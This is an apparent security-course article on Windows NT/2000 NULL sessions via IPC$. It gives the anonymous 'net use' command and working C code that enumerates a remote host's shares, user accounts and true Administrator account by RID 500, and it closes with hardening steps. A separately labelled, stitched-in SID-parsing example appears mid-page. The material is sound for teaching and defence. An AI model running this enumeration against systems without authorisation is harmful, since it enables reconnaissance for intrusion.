Windows NULL session access, Remote Procedure Calls and IPC$

A NULL session connection is an unauthenticated connection to an NT/W2000 machine. Gaining NULL session access to an NT\W2000 system is the number one method for hackers to enumerate information about an NT\W2000 machine. From a NULL session hackers can call APIs and use Remote Procedure Calls to enumerate information. These techniques can, and will, provide information on passwords, groups, services, users and even active processors. NULL session access can also be used to escalate privileges and perform DoS attacks.

See the table below for TCP/UDP ports and their use within NT\W2000.

Keyword        Decimal    Description
---------------------------------------------------------------
loc-srv        135/tcp    Location Service (RPC endpoint mapping)
loc-srv        135/udp    Location Service (RPC endpoint mapping)
netbios-ns     137/tcp    NETBIOS Name Service
netbios-ns     137/udp    NETBIOS Name Service
netbios-dgm    138/tcp    NETBIOS Datagram Service
netbios-dgm    138/udp    NETBIOS Datagram Service
netbios-ssn    139/tcp    NETBIOS Session Service
netbios-ssn    139/udp    NETBIOS Session Service

For more information on port usage, see RFC1001 and RFC1002.

The above ports are often found open on a standard NT\W2000 installation. A null session can only be made to TCP port 139, but the other ports above are often required for code to be called effectively. Port 135, for example, is used for RPC endpoint mapping.

From a hacker's point of view, when thinking about writing code to enumerate information and call remote procedures, exactly what can be called is hard to know, except for the things that are already known. There is little documentation available outside of Microsoft that describes the different calls available after a null session has been established. The only thing hackers can do is try whatever they can think of and see what happens, then try to understand why it works the way it does. There could be things nobody outside Microsoft knows of yet. A lot of what is known, though, is written into tools that enumerate this information: penetration scanners, DumpACL, epdump, Getmac and even net view use these techniques. This is the only way currently coded into NT/Windows 2000 to gather such information remotely. These tools are unfortunately a double-edged sword, a balance between usability and security. Windows 2000 uses this same method for information enumeration, so the same problems/usability will persist.

What this does tell us, though, is that these NULL sessions, RPC etc. should not be allowed on public networks, or even on private networks on some occasions, if security is of concern. This type of access requires the session layer protocols Server Message Block (SMB) and NetBIOS, which provide higher layer functionality than plain TCP/UDP/IP. The TCP/IP connection to port 139 is made, then the session layer protocols SMB and NetBIOS are used to access the NT hidden share IPC$. From the NT command line this can be performed with the following:

    net use \\127.0.0.1\ipc$ "" /user:""

This technique was programmatically written into an old exploit called the Redbutton attack.

From this NULL session connection all the above mentioned tools can be used and standard Microsoft APIs called. For example, the Win32 functions LookupAccountName and LookupAccountSid map an account name to its SID or RID, and a SID or RID to its account name. Examples of these functions being called can be seen in user2sid.exe and sid2user.exe, developed by Evgenii Borisovich Rudnyi.

What is shown below is a programmatic connection to an NT\W2000 machine via a NULL session that then enumerates the true administrator account. This is achieved by using APIs to scan for the SID with the value 500, which is always the Administrator account, renamed or otherwise. The following code segment was supplied by JD Glaser from NT OBJECTives, Inc, which is an excellent site for NT tools that demonstrate this same level of remote access (http://www.ntobjectives.com/).

Follow the comments to see exactly where the APIs are used to enumerate the relevant information.

First - making a NULL Session connection

One way to do this is by using the Net Use command with an empty password. Programmatically, it looks like this:

//Headers needed by the three listings on this page (MFC project, link with netapi32.lib).
//CNTOHunterDlg is the tool's own dialog class (it owns the tree control m_Victims) and is not shown here.
#include <afxwin.h>
#include <afxcmn.h>
#include <lm.h>
#include <stdio.h>
#include <stdlib.h>

//Defined further down the page
bool GetAdmin(char* pServer, char* pUser, CString& Name);
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot);

//This function is called from the dialog that fills the listbox with connections
BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
{
    //Setup for UNICODE
    char* pTemp = TargetHost.GetBuffer(256);
    WCHAR wszServ[256];
    LPWSTR Server = NULL;

    //Convert to Unicode (fails, returning 0, if the name does not fit the buffer)
    if(MultiByteToWideChar(CP_ACP, 0, pTemp,
                           (int)strlen(pTemp)+1, wszServ,
                           sizeof(wszServ)/sizeof(wszServ[0]) ) == 0)
    {
        TargetHost.ReleaseBuffer();
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    //Create the IPC$ share connection string we need
    Server = wszServ;
    LPCWSTR szIpc = L"\\IPC$";
    WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
    DWORD dwServNameLen;
    DWORD dwRC;

    //Setup Win32 structures and variables we need
    NET_API_STATUS nas;
    USE_INFO_2 ui2;
    SHARE_INFO_1* pSHInfo1 = NULL;
    DWORD dwEntriesRead = 0;
    DWORD dwTotalEntries = 0;

    //Set up handles to tree control to insert connection results
    HTREEITEM machineRoot = NULL, shareRoot = NULL, userRoot = NULL, adminRoot = NULL, attribRoot = NULL;
    char sharename[256];
    char remark[256];

    if(Server == NULL || *Server == L'\0')
    {
        TargetHost.ReleaseBuffer();
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    dwServNameLen = lstrlenW( Server );

    //Test for various errors in connection string and recover
    if(Server[0] != L'\\' && Server[1] != L'\\')
    {
        // prepend slashes and NULL terminate
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    else
    {
        dwServNameLen -= 2; // drop slashes from count
        RemoteResource[0] = L'\0';
    }

    if(dwServNameLen > CNLEN)
    {
        TargetHost.ReleaseBuffer();
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
    if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

    //Start with clean memory
    ZeroMemory(&ui2, sizeof(ui2));

    //Fill in the Win32 network structure we need to use connect API
    //(the Net* APIs take Unicode strings; the casts only satisfy the header declarations)
    ui2.ui2_local = NULL;
    ui2.ui2_remote = (LPTSTR) RemoteResource;
    ui2.ui2_asg_type = USE_IPC;
    ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL
    ui2.ui2_username = (LPTSTR) L"";
    ui2.ui2_domainname = (LPTSTR) L"";

    //MAKE THE NULL SESSION CALL
    nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
    dwRC = GetLastError();

    if( nas != NERR_Success )
    {
        //No session, so there is nothing to enumerate and no tree root to hang results on
        TargetHost.ReleaseBuffer();
        SetLastError( nas );
        return FALSE;
    }
    machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT);

    //THIS IS WHERE NT HANDS OUT ITS INFORMATION
    nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,
                       MAX_PREFERRED_LENGTH,
                       &dwEntriesRead,
                       &dwTotalEntries, NULL);
    dwRC = GetLastError();

    if( nas == NERR_Success )
    {
        if(dwTotalEntries > 0)
        {
            shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST);
            userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);
            adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST);
        }

        //Walk the entries actually returned, keeping pSHInfo1 intact so it can be freed
        SHARE_INFO_1* pCurShare = pSHInfo1;
        for(DWORD x = 0; x < dwEntriesRead; x++, pCurShare++)
        {
            // Convert back to ANSI
            WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)pCurShare->shi1_netname, -1,
                                sharename, 256, NULL, NULL );
            WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)pCurShare->shi1_remark, -1,
                                remark, 256, NULL, NULL );

            CString ShareDetails = sharename;
            ShareDetails = ShareDetails + " - " + remark;

            //fill the tree with connect info
            attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);
        }
    }

    //The buffer is allocated by the system and must be released by the caller
    if(pSHInfo1 != NULL)
        NetApiBufferFree(pSHInfo1);

    //My Wrapper function for listing users - see below
    DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

    //WE ARE DONE, SO KILL THE CONNECTION
    nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

    TargetHost.ReleaseBuffer();
    SetLastError( nas );

    return TRUE; //the session was established and enumerated
}

The following function is how one can programmatically determine the administrator status of an account:

bool GetAdmin(char* pServer, char* pUser, CString& Name)
{
    DWORD dwDomainName,dwSize,dwAdminVal;
    SID_NAME_USE use;
    PSID pUserSID = NULL; // SID for user
    char szDomainName[256]; // receives the account's domain (undeclared in the original listing)
    int rc;
    int iSubCount;
    bool bFoundHim = false;

    dwDomainName = sizeof(szDomainName);
    dwSize = 0;
    dwAdminVal = 0;
    iSubCount = 0;

    //Call API for buffer size since we don't know size beforehand
    rc = LookupAccountName(pServer,
                           pUser, pUserSID,
                           &dwSize, szDomainName,
                           &dwDomainName, &use );
    rc = GetLastError();

    //Allocate a larger buffer
    if(rc == ERROR_INSUFFICIENT_BUFFER)
    {
        pUserSID = (PSID) malloc(dwSize);
        if(pUserSID == NULL) return false;

        //Repeat call now that we have the right size buffer
        dwDomainName = sizeof(szDomainName);
        rc = LookupAccountName(pServer,
                               pUser, pUserSID,
                               &dwSize, szDomainName,
                               &dwDomainName, &use );
    }
    else
    {
        rc = 0; //the lookup failed for some other reason
    }

    //Without a SID there is nothing to inspect
    if(!rc)
    {
        free(pUserSID);
        return false;
    }

    //Scan the SIDS for the golden key - ADMIN == 500
    //Get a count of SID's
    iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));

    //Admin SID is the last element in the count
    dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));

    if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN
    {
        Name.Format("Admin is %s\\%s\n", szDomainName, pUser);
        bFoundHim = true;
    }

    free(pUserSID); //allocated with malloc, so release with free rather than delete

    return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE
}
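The RID test that GetAdmin() performs through GetSidSubAuthorityCount and GetSidSubAuthority, carried out directly on the bytes of a SID. This is an added example, not part of the original article or of JD Glaser's code; sid_parse, sid_is_builtin_admin and the sample SID are hypothetical names and constructed data. It goes a little further than the listing by rejecting truncated SIDs and requiring the S-1-5-21 prefix, which is useful when auditing account lists for a renamed Administrator account.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RID_ADMINISTRATOR 500u /* the value GetAdmin() compares against */

/* Binary SID: revision(1) sub-authority count(1) authority(6, big-endian), then
   `count` sub-authorities of 4 bytes each, little-endian. Writes the S-R-A-s1-..-sN
   text to out and the last sub-authority (the RID) to *rid. 0 = ok, -1 = malformed. */
int sid_parse(const uint8_t *sid, size_t len, char *out, size_t outlen, uint32_t *rid)
{
    if (len < 8 || sid[0] != 1) return -1;        /* header present, revision 1 */
    unsigned count = sid[1];
    if (count == 0 || count > 15) return -1;      /* at most 15 sub-authorities */
    if (len != 8 + 4 * (size_t)count) return -1;  /* no missing or trailing bytes */
    uint64_t auth = 0;
    for (int i = 0; i < 6; i++) auth = (auth << 8) | sid[2 + i];
    int n = snprintf(out, outlen, "S-%u-%llu", (unsigned)sid[0], (unsigned long long)auth);
    if (n < 0 || (size_t)n >= outlen) return -1;
    size_t used = (size_t)n;
    for (unsigned i = 0; i < count; i++) {
        const uint8_t *p = sid + 8 + 4 * i;
        *rid = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
               ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
        n = snprintf(out + used, outlen - used, "-%lu", (unsigned long)*rid);
        if (n < 0 || (size_t)n >= outlen - used) return -1;
        used += (size_t)n;
    }
    return 0;
}

/* 1 if the SID is S-1-5-21-<three domain values>-500, 0 if not, -1 if malformed.
   Stricter than GetAdmin(), which only looks at the last sub-authority. */
int sid_is_builtin_admin(const uint8_t *sid, size_t len)
{
    char text[192];
    uint32_t rid = 0;
    if (sid_parse(sid, len, text, sizeof text, &rid) != 0) return -1;
    return sid[1] == 5 && strncmp(text, "S-1-5-21-", 9) == 0 && rid == RID_ADMINISTRATOR;
}

/* Constructed sample: S-1-5-21-1000-2000-3000-500 (the domain values are made up). */
static const uint8_t SAMPLE_ADMIN_SID[] = {
    1, 5, 0, 0, 0, 0, 0, 5,
    21, 0, 0, 0, 0xE8, 0x03, 0, 0, 0xD0, 0x07, 0, 0, 0xB8, 0x0B, 0, 0, 0xF4, 0x01, 0, 0 };

int main(void)
{
    printf("admin=%d\n", sid_is_builtin_admin(SAMPLE_ADMIN_SID, sizeof SAMPLE_ADMIN_SID));
    return 0;
}
```

Because the check depends only on the RID, renaming the Administrator account does not change the result.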

Wrapper for listing the user accounts:

void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)
{
    USER_INFO_10 *pUserbuf, *pCurUser;
    DWORD dwRead, dwRemaining, dwResume, dwRC;
    char userName[256];
    char userServer[256];

    //These three were used but not declared in the original listing
    WCHAR RemoteResource[UNCLEN + 1]; // \\ + computer name + NULL
    DWORD dwServNameLen = lstrlenW(pServer);
    bool GotAdmin = false; // set once the RID 500 account has been found

    dwResume = 0;

    if(pServer[0] != L'\\' && pServer[1] != L'\\')
    {
        //Start string with correct UNC slashes and NULL terminate
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    else
    {
        dwServNameLen -= 2; // drop slashes from count
        RemoteResource[0] = L'\0';
    }

    if(dwServNameLen > CNLEN)
    {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return;
    }

    if(lstrcatW(RemoteResource, pServer) == NULL) return;

    do
    {
        pUserbuf = NULL;

        //THIS IS THE API THAT NT USES TO HAND OUT ITS LIST
        dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024,
                           &dwRead, &dwRemaining, &dwResume);

        if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)
            break;

        DWORD i;
        for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)
        {
            // Convert back to ANSI.
            WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL );

            // Convert back to ANSI.
            WideCharToMultiByte( CP_ACP, 0, pServer, -1,
                                 userServer, 256, NULL, NULL );

            if(!GotAdmin)
            {
                //use char strings
                CString Admin;
                GotAdmin = GetAdmin(userServer, userName, Admin);

                if(GotAdmin)
                {
                    Admin.TrimRight();
                    HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);
                    pDlg->m_Victims.EnsureVisible(adminChild);
                }
            }

            CString strUserName = userName;
            pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);
        }

        if (pUserbuf != NULL)
            NetApiBufferFree(pUserbuf);

    } while (dwRC == ERROR_MORE_DATA);

    if (dwRC != ERROR_SUCCESS)
        printf("NUE() returned %lu\n", dwRC);
}

So what can be done to stop all this?

Several things can be done, but in doing them you will reduce the functionality of your NT\W2000 machine.

A balance between usability/functionality and security needs to be found.

  1. Restrict access to objects from Anonymous accounts (the RestrictAnonymous registry setting).

     Please read MSKB Q143474 to understand the effect this has.

     Strangely, NULL sessions can still be made, but the information that is available is restricted. For example, sid2user will still function even with RestrictAnonymous set.

     See http://geek-girl.com/bugtraq/1997_2/0079.html for the original exploit.

     This registry setting is automatically created within Windows 2000 but is set to (0) disabled.

  2. Removing the 'Workstation' and 'Server' service. This removes the ability of the NT\W2000 machine to respond to client or server requests.

  3. Disabling NetBIOS through the registry and/or removing the 'NetBIOS Interface' service. This removes the session layer protocol NetBIOS, which is required for file sharing (IPC$).

Remember that you must understand what functionality you will lose before making any of these changes. For example, the above level of change(s) may not be desirable for a workstation but would be for a web server.

Things are changing with Windows 2000, as NetBIOS is not actually required anymore in a native Windows 2000 environment. Windows 2000 also reduces the available APIs that can be called, for example the 'reg' calls are greatly reduced. So no longer can registry permissions be enumerated in Windows 2000 like they could within NT. Most of the other calls are still available in W2000 like SID information and the file ACLs all via the NULL session.

There are also other methods for preventing NULL sessions other than the ones described above. These are possibly the most effective at the NT\W2000 O/S level though. See https://www.stationx.net/downloads/ for more information.

On a network level, the TCP/UDP ports 135-139 detailed above would be blocked from public access using firewall(s) and/or filtering router(s).

  • Nathan House

    Nathan House is the founder and CEO of StationX. He has over 25 years of experience in cyber security, where he has advised some of the largest companies in the world. Nathan is the author of the popular "The Complete Cyber Security Course", which has been taken by over half a million students in 195 countries. He is the winner of the AI "Cyber Security Educator of the Year 2020" award and finalist for Influencer of the year 2022.
